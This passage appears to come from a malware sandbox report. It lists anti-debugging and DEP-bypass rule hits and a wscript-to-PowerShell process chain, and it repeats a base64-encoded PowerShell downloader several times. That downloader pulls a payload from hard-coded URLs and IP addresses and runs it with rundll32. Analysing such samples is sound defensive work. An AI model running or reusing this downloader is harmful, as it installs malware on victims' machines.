IAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | wscript "C:\ProgramData\overrimBowsie.js" TherapeutismUnadopt dutchess crystallising | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\ProgramData\overrimBowsie.js" TherapeutismUnadopt dutchess crystallising | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" | ||||||
parent_process | wscript.exe | martian_process | powershell -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXA